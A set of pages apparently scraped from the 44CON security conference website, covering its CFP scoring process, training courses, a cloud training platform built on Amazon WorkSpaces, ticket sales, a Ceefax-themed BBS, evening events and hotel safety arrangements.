London, you regularly monitor your nominated e-mail account, so that we can complete the necessary supporting activities such as booking flights, accommodation etc. Failure to to take reasonable steps to support us in minimising costs in these areas may result in your talk being withdrawn. .------------------------------------------------------------------------------. | | | Software Failure. Press left mouse button to continue. | | Guru Meditation #00070000.48454C50 | | | '------------------------------------------------------------------------------'

 

#####EOF##### aws – 44CON

Building a cloud security training platform – Pt 2: Infrastructure As Code

This is a guest post by one of our trainers, Paul Schwarzenberger. Paul is running the fantastic Cloud Security and DevSecOps training course this June. He also has a blog where he talks about AWS, Cloud Security and DevSecOps. This is part of a series on how he’s built a platform to make things easier for those attending his training. Part 1 is available here. Thanks, Paul! Continue reading “Building a cloud security training platform – Pt 2: Infrastructure As Code”

Building an AWS and Azure security training platform

This is a guest post by one of our trainers, Paul Schwarzenberger. Paul is running the fantastic Cloud Security and Devops training course this June. He also has a blog where he talks about AWS, Cloud Security and DevOps. This is part of a series on how he’s built a platform to make things easier for those attending his training. Thanks, Paul!

Part 1 – Proof of Concept

The Cloud Security and DevSecOps training course I’m delivering for 44CON in June includes AWS, Azure and GitHub accounts which the students use so they don’t need to create their own.

Wouldn’t it be great if students could turn up with any laptop, or even an iPad, and do the course. And the time spent on the labs would be used to learn about cloud security and DevSecOps, not debugging software installation issues.

Continue reading “Building an AWS and Azure security training platform”

#####EOF##### cfp – 44CON

The 44CON CFP just closed. You won’t believe what happens next.

Edit: This post was originally written just after the CFP closed in 2017. If you’re here from a CFP-related link, don’t assume this year’s CFP is closed. If you’re not sure, check the CFP system for the latest info.

Each year 44CON attracts between 100-200 submissions. Some of these are excellent talks, some are average and some are, well, let’s just say that some are below average. In this blog post I’ll try to go through what happens when the CFP closes and to help you answer the immortal question, “Has my talk been accepted/rejected?”

Along the way I’ll announce our first accepts, and most importantly explain the why of our CFP process.

Continue reading “The 44CON CFP just closed. You won’t believe what happens next.”

How to game the 44CON CFP

Every year 44CON has a Call For Papers (CFP). The CFP is run by a panel of about 10 people from various parts of the industry, predominantly based in the UK. The process and technologies used have changed over the years, most notably last year when we replaced our existing bespoke CFP system with HotCRP and implemented a weighted average scoring mechanism based on HotCRP voting results.

TL;DR – I want to speak at 44CON

Ok, then do these things to boost your chances:

  1. Submit a workshop with your talk
  2. Make it clear where else you’ve submitted and/or might/will submit
  3. Include links to other talks you’ve done, video if you have it
  4. Get your talk in early for a better chance of scoring higher
  5. Be enthusiastic, tell us of any boundaries, problems or needs, and work with us, not against us

Understanding how the CFP works

The CFP is opened on a particular date for submissions. Everyone speaking in Track 1 or 2 must go through the CFP process. Track 3 (which is sometimes used for workshops) is a little more fluid, for reasons I’ll discuss later.

Scoring and voting

A gypsy fortune teller brings her crystal ball to life to read the future.
Scoring is as much an art as science, but you can improve your chances of speaking at 44CON.

Our panel votes on and scores talks out of 5, normally in several tranches. It varies by individual and not everyone votes on every talk. People provide comments and feedback, which we pass onto those submitting on request. On average we get between 200-400 submissions a year.

When the CFP is due to close, we push panel members along to review and score submissions, particularly if they haven’t yet been voted on.

Once voting is complete, we divide the sum of scores from each voter by the number of voters to get an average, with an option for discussion under certain circumstances that can weight a score by up to + or – 0.5.

UK submissions normally get up-voted (with some exceptions, see below), and in the selection rounds there’s a strong bias towards UK-based speakers over non-UK-based speakers with identical scores, unless the non-UK-based speaker’s talk is exceptional in other ways. This doesn’t mean that your talk will be rejected if you’re not based in or from the UK. Non-UK based speakers make up the majority of our speakers, but there is definitely a small “home bias” amongst the panel members based in the UK.

Why does it take so long to find out if I’m accepted?

If you're not sure what's happening, contact us and we'll give you an update.
If you’re not sure what’s happening, contact us and we’ll give you an update.

Once we have the results we look to fill a specific number of slots, which varies each year. Acceptance messages are sent out in tranches, and when people return the speaker agreement, they’re confirmed. We normally send rejections for very low scoring talks, but there’s a glut of talks usually falling between 3.5-4.0, where they might be accepted if others scoring higher can’t make it.

If you’ve scored an average of 5.0, you’re pretty much guaranteed a slot and we’ll get in touch straight away. The bulk of submissions tend to hover around a score of 3-4, and 4.5 is normally the cut-off point for the first tranche of accepts. We then wait till the first tranche come back, or if we get no response, chase them up twice before moving on.

For the slots that free up, we move down the list, ensuring those who scored highest get picked first. Once we’ve filled up tracks 1 and 2, we move on to track 3.

After the first round of talk triage, cut-off tends to happen around average scores of 4.25 – 4.0/5.What this means is that there are a lot of good talks that just don’t get accepted at 44CON because we don’t have the space to support them, even with a third track. More often than not a talk or workshop rejection from 44CON does not mean it sucks. Ask for feedback and we’ll share what we can.

Wait, isn’t 44CON a two-track conference?

All speakers dress like this when preparing submissions.
All speakers dress like this when preparing submissions.

Yes and no. For several years we’ve run a hidden track under various names. This is because we’ve wanted to give our backup speakers a chance to speak if someone drops out, but we don’t want to risk slots emptying on the main tracks. Inevitably people drop out along the way, people who are allocated to track 3 move onto the main tracks and this leaves gaps that we have the option to fill.

Sometimes we’ll look back at the talks list and look to offer a spot to someone on the list, however sometimes it’s easier to go to people we know are definitely coming and see if they have something. This is a completely arbitrary decision affecting two slots a year at most, and more often than not, 10-20 people want the slots. We generally operate on a first come, first serve basis.

Hacking the process

Now you know how the process works, let’s look at how you can subvert it to ensure your talk has the best chance of scoring high. Each voter on the panel is different, but there are certain things that, on average, will result in you being more favourably considered.

Submit both Talks and Workshops

We have 2-3 tracks to fill with talks, and get on average 200-400 submissions a year. We get less than 20 workshop submissions a year. Workshops are 2 hours long and come with an extra night’s accommodation when talks are also submitted.

If you want to maximise your chances of speaking at 44CON, submit a workshop.

Workshops are typically more intimate affairs with room for about 30-50 people sitting down, although we have had workshops with 100 people. If you’re not sure what to do in a workshop, imagine that if your main talk is about the theory, try a play-along walkthrough on how to do this in practice.

Every year we’ve run a formal CFP process, we’ve treated people who submit workshops far more favourably than people who submit talks alone. Even if your workshop is unrelated to your talk, both are likely to be up-voted considerably.

I cannot stress this enough. If you want to maximise your chances of speaking at 44CON, submit a workshop.

This only works if you submit your workshop separately to your talk. People submitting a talk and workshop in one don’t get the voting benefit separate talk and workshop submissions do. Finally, if you’re only prepared to come if your talk is accepted, please say so on both submissions.

Tell us where else your talk has been submitted

44CON is usually among the first events in the calendar after BlackHat and DefCon. Everyone wants to speak in Vegas, we understand that. Some people score BlackHat and DefCon talks slightly lower in order to give preference to newer talks, some don’t. It’s down to the panel. If you don’t tell us you’re talking at BlackHat or Defcon, and we find out by checking the site, panel members will remember next year and it may affect future submissions.

If you’re doing your reveal in Vegas, focus on your process at 44CON.

Not everyone in the UK can go to BlackHat or Defcon, so there’s not a massive deal in your talk being done in the UK afterwards. We do need to know what will be different. It takes a lot of effort to deliver a big Vegas talk, and making something different may seem like an awful lot of effort, but there’s an easy workaround that normally gets big bounces.

If you’re doing your reveal in Vegas, focus on your process at 44CON. If you spent 6 months trying to reverse engineer and compile code for an arcane architecture, we want to know how you went about it. We also appreciate failures as much as successes. Some of our better talks have been talks about how people have failed and what they learned.

If your talk is 70% different to your Vegas talk, say so. If it’s 50%, say so. If it’s 30%, say so. If you say so, and it’s not, then reviewers will know next year.

Show us your other talks

A picture speaks a thousand words, but a video of your talk lets the panel look at the type of speaker you are, how you approach your talks, and gives us an idea of where we think you might fit in best.

Show us your other talks, even if you're a rockstar.
Showing us your other talks helps us fit you in.

This is an especially powerful tool for speakers coming from countries where English is a second language. All of our talks are delivered in English. We have some great speakers from across Europe, India and even China, and we want to keep the focus on the content, not on the way it’s conveyed.

It can be pretty scary delivering a talk in a second or third language, and it’s useful to see you speak, both to reassure voters when you’re delivering a talk, and to determine what help we might be able to offer if your research is brilliant, but you struggle with the language.

Even if you’re a native English speaker, throwing us a link to earlier talks lets us work out where and when we can put you. We often put more energetic speakers on in the afternoon for example.

Submit your talks early in the process

Most of the panel vote in several stages. Almost everyone votes for the first submissions coming in, and slowly dribble off after a while. At several points while the CFP is open, more people will vote, but because there are fewer talks to vote on, we’ve noticed that early talks score higher on average than those submitted later.

The more votes you get, the better the chance of bringing your voting average up and the better the chance of your talk being accepted. Submitting early gets you more (and often higher) voting scores.

Remember It’s A Two-Way Street

We completely understand how much of an effort you put in to come to speak at 44CON. Many of the crew talk at conferences themselves, and understand that you’re giving your time for free to go and speak at an event. That’s why we try to make the talk as cost neutral as possible for you to come and present. When people interact more with the event, and try to get involved, they’re generally more likely to have more positive responses.

There are certain speakers who come back to 44CON regularly such as Jerry Gamblin, Saumil Shah and Joe Fitzpatrick amongst others, all of whom make really strong efforts to interact with the crew and those attending. If, in your submission, you come across like you’re treating 44CON as just another con to shop the same talk around and disappear, you’re probably going to score lower than someone who comes across as though they really want to be there.

Coping with rejection

Our scoring method is not without its faults. No scoring system is perfect, and we’ve had to break bad news to big names as well as people with talks some of us thought were brilliant fits for the event.

If you don't hear from us straightaway, wait or contact us, don't assume your talk was rejected.
If your talk was rejected, it’s not an indictment of you or your talk.

To help you deal with the sting of rejection, remember this:

  1. Your talk not being accepted at 44CON does not mean we thought it was bad.
  2. You absolutely have the right to ask for feedback. It might take a while depending on when you ask, but Steve will personally write back to you with as much detail as he can provide.
  3. We’re all here to learn. If you think that we’ve made a mistake, or have ideas on how we can improve (beyond “accepting my awesome talk next time, dumbasses”), then we want to know.

Most importantly, your talk not being accepted does not mean we don’t want you to come and enjoy 44CON. We absolutely do want you to come, and will happily offer you a discount on a ticket as a thank you for submitting.

We want everyone to have a good time at 44CON. If you have any special needs or requests, from assistance with disabilities to being able to bring your kid(s) along just let us know. Unless it’s something we absolutely cannot accommodate, it will have no bearing on your submission’s consideration.

#####EOF##### 44CONnect March Week – What to expect – 44CON

44CONnect March Week – What to expect

We have a fantastic week planned from March 11th-14th with training, a day of talks and of course hanging out with our friends at CRESTCon. If you want to take part there’s still time, just book a seat on Rory’s course, or contact us from your early bird ticket e-mail address.

Monday 11th March – Training

Training opens at the Novotel London West for registration at 08:15 GMT with a 09:00 Start. Coffee and breakfast snacks will be available from 08:30. There are opportunities to break throughout the day and of course lunch is provided.

Training tickets are available until we run out of seats or the 8th of March. There are hardly any seats left, so sales may close before the 8th. Book your seat now.

Tuesday 12th March – Training

Once again, doors open at 08:15 GMT. We’ll have breakfast snacks and coffee to keep you going, and lunch is provided in the restaurant.

Wednesday 13th March – 44CONnect

If you have an invite to 44CONnect, you’ll get an email telling you where it is. If you don’t, and want one, the easiest way is to book a seat on Rory’s course, or to email us if you’ve bought an Early Bird ticket.

Doors open from 09:30 – 10:00 for a 10:00 start. Here’s the current schedule (subject to change):

10:00 – Rory McCune – Container Security
11:00 – Owen Shearing & Will Hunt – Exploiting in.security
12:00 – Lightning talk round for attendees
12:30 – Lunch (included for training attendees only)
14:00 – Steve Lord – Let The Right One In: Enterprise Containerized Honeyclouds
15:00 – Dave Ryan – Reporting is dead. Long live reporting.

From 16:00 we’ll have an open drinks tab, then open the space up to the public from 17:00. If you don’t have an invite, drop @stevelord a DM on twitter around 16:00 and he’ll let you know where to go.

Thursday 14th March – CRESTCon

We’re really excited about CRESTCon. 5 Lucky people won CRESTCon tickets through our competition. We’ll have a table there with a new sticker design, so come over and say hello!

As well as tickets, we’ll be there to answer questions about our CFP, talk about training and of course, check out the talks.

CRESTCon takes place at the Royal College of Physicians, 11 St Andrews Pl, Regent’s Park, London NW1 4LE. Tickets cost £175 and are available from the CRESTCon site.

#####EOF##### videos – 44CON

More 2018 44CON Videos Added

This week we’ve added another 5 videos from 44CON 2018. We’re also starting to move our older conf talk videos over to the YouTube channel, so if you’d like them to show up in your stream, don’t forget to subscribe to the 44CONtv channel and click the bell to get notifications as new videos go up. From now on, all of our videos will be up on YouTube as soon as the 1s and 0s can carry them. Continue reading “More 2018 44CON Videos Added”

First Videos From 44CON 2018 Up

For a long time we used to sell access to videos on Vimeo. Recently we moved back to making videos freely available on YouTube. Due to some last minute issues with 2018 we had to do a bit more work to get the 2018 videos to a point we were happy with. However, in 2019 the wonderful Ministraitor will be supporting our videos, and we’ll be able to provide them for free from now on. The first 5 videos from 2018’s 44CON are now ready to go, so read on for the vids and our thoughts. Continue reading “First Videos From 44CON 2018 Up”

#####EOF##### 44CON 2019 – 44CON

Hacking 44CON’s Pricing Model (5 Different Ways)

It seems like it was only two weeks ago when we announced the early bird tickets, but sadly all 50 have been snapped up. Still, being the great folks we are, we wanted to show you 5 different ways to hack the 44CON ticket pricing model because, well, basically we’re good guys like that. After all, we taught you how to game the 44CON CFP and that worked well. In the words of every security researcher everywhere, “What could possibly go wrong?” Continue reading “Hacking 44CON’s Pricing Model (5 Different Ways)”

44CON 2019 Early-Bird Tickets are now on sale

Our 2019 Early bird tickets are now on sale. There are 50 early bird tickets available until March 11th. Once they’re gone, they’re gone. As usual, the early-bird prices still start at £299 inc. VAT, but there are also accommodation and t-shirt options available.

We’re trialling a small selection of cheap expo tickets providing limited event access with certain groups, and there will be pre-registered free evening event tickets. Early bird tickets are the cheapest fully catered, full access tickets you can get. If you want to see the talks, you want one of these.

As well as full access to 44CON, Early bird ticket holders can also ask for an invite to our 44CONnect event in London on the 13th of March. This invite-only event will take place the day before CRESTCon, and will feature talks from some of the trainers taking part in our quarterly training programme. Please make sure you mention 44CONnect on your booking, or contact us after booking if you’d like to come.

Book your tickets in our shop. If you’d like to book in bulk or through your employer, contact us to arrange an invoice.

#####EOF##### Training – 44CON

Building a cloud security training platform – Pt 2: Infrastructure As Code

This is a guest post by one of our trainers, Paul Schwarzenberger. Paul is running the fantastic Cloud Security and DevSecOps training course this June. He also has a blog where he talks about AWS, Cloud Security and DevSecOps. This is part of a series on how he’s built a platform to make things easier for those attending his training. Part 1 is available here. Thanks, Paul! Continue reading “Building a cloud security training platform – Pt 2: Infrastructure As Code”

Building an AWS and Azure security training platform

This is a guest post by one of our trainers, Paul Schwarzenberger. Paul is running the fantastic Cloud Security and Devops training course this June. He also has a blog where he talks about AWS, Cloud Security and DevOps. This is part of a series on how he’s built a platform to make things easier for those attending his training. Thanks, Paul!

Part 1 – Proof of Concept

The Cloud Security and DevSecOps training course I’m delivering for 44CON in June includes AWS, Azure and GitHub accounts which the students use so they don’t need to create their own.

Wouldn’t it be great if students could turn up with any laptop, or even an iPad, and do the course. And the time spent on the labs would be used to learn about cloud security and DevSecOps, not debugging software installation issues.

Continue reading “Building an AWS and Azure security training platform”

44CONnect – A 1-day invite-only event in March 2019

44CONnect is a 1-day invite-only event taking place on the 13th of March, somewhere in London. The purpose of the day is to bring together people doing 44CON training, so they can connect with trainers and people on different courses. It’s our way of giving people who’ve attended our courses the chance to get a taste of upcoming training, and the opportunity to get some extra credit to take back to the office.

To qualify for an invite, you need to have done one of the following:

There are 20 tickets available, so make sure you qualify!

Our trainers from the last two days of training will deliver talks, as well as some of those delivering courses later this year. All of our training course delegates are invited, for whom lunch will be included. Early bird ticket holders invited to the event will have to buy their own lunch, as we can’t book it for them in advance.

There’ll be a special round of lightning talks for training delegates to deliver a short talk about something they learned on their course. Those speaking will get a small certificate of thanks that they can take back to the office.

Drinks have been organised for the evening, but we need to be in bed early for CRESTCon the next day.

*Early-bird ticket holders will be chosen at random throughout February, although unsubstantiated rumours abound that asking for an invite on your ticket order may drastically improve your chances…

Network Forensics: A blog post by Erik Hjelmvik

I have learned a lot about how to track malware and attackers in network traffic while developing and improving the network forensics tool NetworkMiner throughout the past  10 years. The primary purpose of NetworkMiner has always been to help incident responders and forensic investigators to do their job more efficiently. Even though NetworkMiner is my favourite tool for analysing PCAP files I’m still a regular user of other tools such as  Wireshark, tshark, tcpdump, Argus, ngrep, tcpflow and of course CapLoader. However, incident response and forensic work is much more than just knowing what tools to use. It is more about knowing what data to analyze and why.

I will teach several of my favourite techniques for analysing intrusions, tracking criminals and doing threat hunting at the Network Forensics Training at 44CON. The participants will learn how to investigate intrusions and find forensic artefacts in a dataset of several gigabytes of captured network traffic. The training primarily focuses on practical analysis techniques for finding and tracing malicious actors, which involves a great deal of hands-on practice with finding evil in PCAP data.

The first day of training focuses on analysis using only open source tools. The second day primarily covers training on the commercial software from Netresec, i.e. NetworkMiner Professional and CapLoader. All students enrolling in the class will get a full 6 month license for both these commercial tools. This training is not only a unique opportunity to learn how to use NetworkMiner and CapLoader directly from the guy who develops them, it is also a great excuse to spend two full days playing around with PCAP files.

You can find more details about the training here.

Tickets for 44CON 2016 are on sale

44CON 2016 tickets are now on sale in our shop go and get yours now!

We also have 4 great training courses by Saumil Shah, Dawid Czagan, Joe FitzPatrick, Dominic Chell and Marcus Pinto, go check them out and book your place early to avoid disappointment as courses will be cancelled if minimum numbers are not reached 3 weeks before the conference.

44CON is the UK’s premier annual technical security conference and training event. 44CON 2016 will be taking place from the evening of the 14th September until the 16th September at the ILEC Conference Centre, you can expect a jam packed few days of awesome talks, food and of course alcohol. 

Our CFP closes tonight (Friday 10th June) so if you have something awesome to share get it in now before it’s too late.

Finally, check this great day out at the Farnborough International Air Show from our friends at Suits & Spooks on 14th July, Counterespionage: the need for speed, and use the code 44CON for a 5% discount on both package options.

Dawid Czagan’s training course is still going ahead

Have you ever thought of hacking web applications for fun and profit? How about playing with authentic, award-winning security bugs identified in some of the greatest companies? If that sounds interesting, join Dawid Czagan‘s training course, Hacking web applications – case studies of award-winning bugs in Google, Yahoo, Mozilla and more, on the 27th and 28th April 2016. It will take place at the ILEC Conference Centre.

Do check it out!

Training course at 44CON Cyber Security 2016

Have you ever thought of hacking web applications for fun and profit? How about playing with authentic, award-winning security bugs identified in some of the greatest companies? If that sounds interesting, join Dawid Czagan‘s training course, Hacking web applications – case studies of award-winning bugs in Google, Yahoo, Mozilla and more, which we will be running after 44CON Cyber Security 2016, on the 27th and 28th April 2016. It will hopefully take place at the same venue as the conference.

Do check it out!

#####EOF##### Building an AWS and Azure security training platform – 44CON

Building an AWS and Azure security training platform

This is a guest post by one of our trainers, Paul Schwarzenberger. Paul is running the fantastic Cloud Security and Devops training course this June. He also has a blog where he talks about AWS, Cloud Security and DevOps. This is part of a series on how he’s built a platform to make things easier for those attending his training. Thanks, Paul!

Part 1 – Proof of Concept

The Cloud Security and DevSecOps training course I’m delivering for 44CON in June includes AWS, Azure and GitHub accounts which the students use so they don’t need to create their own.

Wouldn’t it be great if students could turn up with any laptop, or even an iPad, and do the course. And the time spent on the labs would be used to learn about cloud security and DevSecOps, not debugging software installation issues.

When I’ve delivered similar courses in the past, students brought their own laptops and installed the software they needed for the hands-on AWS and Azure security labs, either in advance or during the course.

For this course, Steve suggested I create a YouTube video showing how to install the various software needed, and that got me thinking – wouldn’t it be great if students could turn up with any laptop, or even an iPad, and do the course. And the time spent on the labs would be used to learn about cloud security and DevSecOps, not debugging software installation issues.

So I started looking at building a training platform which students can use – and as this is a cloud security course, what better place to do this than in the cloud?

First step was a proof of concept – so I created some Amazon WorkSpaces instances in the cloud, manually using the AWS console, and started installing software.

Within 30 minutes, I had created two virtual desktops in the cloud – one Windows, the other Linux, and connected to each in turn with the Amazon WorkSpaces client from my laptop. The user experience was really good – even when connecting over mobile data. Then I installed the software I needed for the course, tested it, and created workspace bundles to be used as images for future builds. I created new WorkSpaces from the bundles to make sure that they came up correctly with all the software preinstalled and configured.

So I’ve successfully proved the concept – the next step is to develop a design for a solution which could be used for 10 – 20 students, with full automation for building and tearing down the training environment immediately after the course – to avoid unnecessary bills!

This is the design I came up with, after doing some research on Amazon WorkSpaces and AWS Directory Services:

AWS Directory Services has several options, the one I selected was Microsoft Active Directory Standard Edition, which can be used with both Windows and Linux Amazon WorkSpaces.

As this is a cloud security course, it’s important that the design isn’t just functional, but also demonstrates secure cloud architectures.

The design includes:
• Virtual Private Cloud (VPC) with private address space
• private user subnets, containing the AWS managed Active Directory domain controllers and the WorkSpaces, with no route to the Internet
• public DMZ subnets for outbound access to the Internet using NAT Gateways
• Windows Server 2016 instance for administration and setup of the Active Directory domain, users and groups
• Security group on the admin server only allowing inbound remote desktop access from a single IP address.

If you’re wondering how the Amazon WorkSpaces client connects via the Internet, that’s not shown on this diagram, as it’s managed by AWS via a second network interface on each WorkSpace virtual desktop.

The next step is to set up a new AWS account for the training platform. I’ll cover that in the next Blog post.

Paul’s Cloud Security and DevOps Workshop course runs on the 6th and 7th of June.

Book now

#####EOF##### 44CON – 44CON

Building a cloud security training platform – Pt 2: Infrastructure As Code

This is a guest post by one of our trainers, Paul Schwarzenberger. Paul is running the fantastic Cloud Security and DevSecOps training course this June. He also has a blog where he talks about AWS, Cloud Security and DevSecOps. This is part of a series on how he’s built a platform to make things easier for those attending his training. Part 1 is available here. Thanks, Paul! Continue reading “Building a cloud security training platform – Pt 2: Infrastructure As Code”

More 2018 44CON Videos Added

This week we’ve added another 5 videos from 44CON 2018. We’re also starting to move our older conf talk videos over to the YouTube channel, so if you’d like them to show up in your stream, don’t forget to subscribe to the 44CONtv channel and click the bell to get notifications as new videos go up. From now on, all of our videos will be up on YouTube as soon as the 1s and 0s can carry them. Continue reading “More 2018 44CON Videos Added”

First Videos From 44CON 2018 Up

For a long time we used to sell access to videos on Vimeo. Recently we moved back to making videos freely available on YouTube. Due to some last minute issues with 2018 we had to do a bit more work to get the 2018 videos to a point we were happy with. However, in 2019 the wonderful Ministraitor will be supporting our videos, and we’ll be able to provide them for free from now on. The first 5 videos from 2018’s 44CON are now ready to go, so read on for the vids and our thoughts. Continue reading “First Videos From 44CON 2018 Up”

Building an AWS and Azure security training platform

This is a guest post by one of our trainers, Paul Schwarzenberger. Paul is running the fantastic Cloud Security and Devops training course this June. He also has a blog where he talks about AWS, Cloud Security and DevOps. This is part of a series on how he’s built a platform to make things easier for those attending his training. Thanks, Paul!

Part 1 – Proof of Concept

The Cloud Security and DevSecOps training course I’m delivering for 44CON in June includes AWS, Azure and GitHub accounts which the students use so they don’t need to create their own.

Wouldn’t it be great if students could turn up with any laptop, or even an iPad, and do the course. And the time spent on the labs would be used to learn about cloud security and DevSecOps, not debugging software installation issues.

Continue reading “Building an AWS and Azure security training platform”

Hacking 44CON’s Pricing Model (5 Different Ways)

It seems like it was only two weeks ago when we announced the early bird tickets, but sadly all 50 have been snapped up. Still, being the great folks we are, we wanted to show you 5 different ways to hack the 44CON ticket pricing model because, well, basically we’re good guys like that. After all, we taught you how to game the 44CON CFP and that worked well. In the words of every security researcher everywhere, “What could possibly go wrong?” Continue reading “Hacking 44CON’s Pricing Model (5 Different Ways)”

44CON 2019 Early-Bird Tickets are now on sale

Our 2019 Early bird tickets are now on sale. There are 50 early bird tickets available until March 11th. Once they’re gone, they’re gone. As usual, the early-bird prices still start at £299 inc. VAT, but there are also accommodation and t-shirt options available.

We’re trialling a small selection of cheap expo tickets providing limited event access with certain groups, and there will be pre-registered free evening event tickets. Early bird tickets are the cheapest fully catered, full access tickets you can get. If you want to see the talks, you want one of these.

As well as full access to 44CON, Early bird ticket holders can also ask for an invite to our 44CONnect event in London on the 13th of March. This invite-only event will take place the day before CRESTCon, and will feature talks from some of the trainers taking part in our quarterly training programme. Please make sure you mention 44CONnect on your booking, or contact us after booking if you’d like to come.

Book your tickets in our shop. If you’d like to book in bulk or through your employer, contact us to arrange an invoice.

Building A Permanent Community At 44CON

44CON’s always been the kind of place where you turn up, hang out with friends old and new, get your head bent then go home and get on with your life. But we want to do more than that. We’re building a permanent community for everyone, whether you come to 44CON or not. We’re also mostly old(er Steve, damnit! – A) and riddled with nostalgia. Instead of using Snapbook, or Slickchat or whatever the cool kids use, we thought we’d build a traditional Bulletin Board System and drag it kicking and screaming into the modern age.

To say this was a bad idea was an understatement. Our first attempt used a hodge-podge of Docker, a piece of DOS-based software last updated before the average attendee was born and one instance of a DOS emulator per connection. It worked, but was telnet only (thanks to the joys of serial emulation) and was very, very unstable.

In the end we settled on a modern BBS implementation that has a learning curve almost as steep as Radare2, but allows us to do cool modern things, like provide access over SSH and HTTPS. Originally we worked on supporting older platforms like the BBC Micro, C64 and ZX Spectrum, but everything old struggled with newer software, and everything new struggled with older software.

Finally, we have something we think you’re going to love. Registration will open on the 12th of September. May we present the official 44CON rumour mill, Juicy HQ:

Screen Shot 2018-08-29 at 20.37.05

For those of you who’ve never used a BBS before, the first thing you need to know is that you apply for an account (register). Once you’ve filled in a form, you’ll be taken to the new scan screen. This is to check for updates since you last logged on. There are public and private message areas, file uploads (check out our collection of classic British hacking textfiles, or our PoC||GTFO archive) and you can play multiplayer old-school BBS games courtesy of our DoorParty setup. If things seem a little less interactive, remember that BBSes were typically built to serve very few, if any concurrent users, and most content was downloaded in batches for later offline use.

Screen Shot 2018-08-30 at 11.24.12

Screen Shot 2018-08-30 at 11.14.03Most British people never really got to use dial-in BBSes back in the day due to BT’s monopoly and pricing, although Prestel and Micronet had some popularity. There was one information system that every British person had access to, which was Teletext. On the BBC, we had Ceefax. So we built our BBS around a Ceefax theme, although you might spot the odd reference to Teletext classics such as Bamboozle and even Digitiser. And yes, all of this is accessible in a web browser.

Screen Shot 2018-08-29 at 20.37.41

Although Juicy HQ is the official 44CON BBS, it’ll be open to everyone from the 12th of September. Whether you’ve been to 44CON or not, live in the UK or not, or if you’ve never been to a conference before, all are welcome providing Wheaton’s law is followed at all times.

 

 

Screen Shot 2018-08-29 at 20.38.33

We’re still refining Juicy HQ in preparation for launch, but we’re making sure there’s plenty of easter eggs for you to find. If you’re interested in beta testing the BBS, give Steve a shout on twitter or mastodon and he’ll hook you up.

What To Expect On Thursday Night

44CON’s a bit different to some other cons in that we tend to run our own Thursday night entertainment instead of a traditional sponsor party. Sponsors and others are welcome to run their own events if they prefer, and indeed, this year some are. Last year was a little quiet, mostly due to Steve not being well enough to plan things.

If you’ve never been to a 44CON, or if last year was your first, you might not expect much, but this year we have a lot going on.

HackerOne_black_1

First of all, the biggest of big big shout outs go to our dear friends and Gold sponsors, HackerOne, without whom this night wouldn’t happen. HackerOne are sponsoring the entire evening, so make sure you thank them for helping out. We’ll have complementary food and drinks from Gin O’Clock onwards courtesy of our Gin O’Clock sponsors Crowdfense, up till 19:00, and at various points and places in the evening from 19:50 onwards courtesy of HackerOne. As well as a selection of Alcoholic drinks, we’ll also have a fantastic Mint and Elderflower Fizz mocktail and soft drinks for those who want to keep things light.

The evening session starts at 19:00 with Pwning the 44CON Nerf Gun, by Chris Wade and Dave Lodge of PenTest Partners. This is no ordinary stunt hack talk. The Nerf Terrascout is pretty well put together for a toy tank, and it took the PTP guys a heck of a lot of effort in reversing proprietary RF protocols, manipulating the SPI bus and all kinds of wacky techniques, all to hijack the controller in real-time so they can shoot Steve. This is rather odd, as it’s absolutely not going to happen. The crew won’t let Steve get shot…. honest!

Nicky Bloor will be running a two-hour workshop from 20:00 on Diving Deep into Deserialization, starting with an overview, then diving through exploit and gadget chains into a CTF-style VM for you to play along with (so don’t forget your laptop). Expect this to bend your head a little, but you’ll come out of the other side made of steel.

Looking for something more blue team than red? From 20:00, Phillipe Arteau will run a two-hour workshop on Machine Learning with the Orange data visualization, machine learning and data mining toolkit. His workshop, Orange is the new Hack is essential for anyone conducting triage and will take you through implementing vulnerability classification at scale. The same skillset can be applied to other contexts such as malware classification, system alert classification and vulnerability management.

While the workshops are going on, we’ll have Duckies Den in Track 1 from 20:00. Pitch your ideas to our panel of industry duckies, who’ll award beer tokens accordingly. Our sponsors will also get short pitch slots… but the audience get the beers. This year’s theme for our attendees is “Zany cybersecurity ideas that don’t exist, and probably shouldn’t”. Prizes will be awarded for:

  • Best billed idea
  • Most lame duck pitch
  • Most quackers concept

Could your idea be the nest big thing? Which pitches will fly, and which will sink without a trace? Waddle our panel of duckies take under their wing? Will our sponsors earn a feather in their cap, or will they cry fowl play? It’s not just an eggscuse for duck puns, but we’re sure avian will have a good time!

If it’s all a bit too much and you want to veg out in front of a film, we’ll be screening all-time classic The Big Lebowski in the coffee area from 20:00. Chill out on the sofas, grab some snacks and see what happens when you meet a stranger in the alps. If you don’t like The Big Lebowski, well, that’s just your opinion, man.

Last year we had Linux Kernel poetry and Yoga. This year we’re looking for lightning talks with a twist in our Lightning Talk Poetry Slam from 22:00 in Track 1. Slots are 5-15 minutes long, and should feature either in part or in hole, some form of poetry. Haikus, Limericks and epic Rap battles are most welcome. Sign up at the front desk, then come up, either take a shot of Sourz or try a British snack and SHOW US WHAT U GOT.

On Hotel Accommodation And Safety

First and foremost, if you’re attending 44CON, please add this phone number to your contacts list, under “44CON”. It’s our at-event emergency crew contact number:

+44 (0)7955 376 729

Recent events in Las Vegas as a result of policy changes following the Mandalay Bay shooting seriously affected some of our attendees visiting the city for conferences in early August. We watched from a distance in abject horror as people routinely had their privacy and safety compromised by aggressive security teams demanding entry to rooms and confiscating soldering irons and lockpicks, some of which we understand haven’t been returned to their owners.

While we completely understand the need to beef up security in the shadow of yet another mass shooting in America, the horrific stories that unfolded on twitter made us ask ourselves what we were doing to ensure that such invasions of safety and privacy don’t happen here.

To that end, we’ve done two things:

  1. We’ve asked the ILEC’s attached hotel under what terms they’ll enter rooms booked there.
  2. We’ve set up an emergency contact number you can call to reach the crew at any time during the event.

In the UK there are reasons under which your hotel room can be forcefully entered, but generally it shouldn’t need to happen unless your stay is longer than a few days and you’ve left the Do Not Disturb tag on your door. This is partly to check that you’re still alive, and also to check you haven’t trashed the hotel room. From the ILEC:

We do not access guests rooms apart from cleaning. If the Do not disturb sign is displayed up to 3 days we do not enter but after that we have to check. Initially we would ring the room and if the guest answers we would ask to go and see the room if it is inacceptable[sic] conditions ( as in damages).

If there is a fire evacuation the fire marshals will go floor by floor and knock and open the rooms for people to evacuate as they can be asleep.

The only other reason for someone to enter the room by force would be if the police or fire service needed to enter in an emergency.

The author of this post is a man, but the 44CON crew are a mix of men and women. If you’re struggling to see why this is primarily a safety rather than privacy issue, I think Joe Fitz summed things up best in this twitter thread:

“I sympathize with @maddiestone and @k8em0 ‘s experiences but realize I can’t possibly know how terrified they probably felt.”

Once again, that emergency crew number is:

+44 (0)7955 376 729

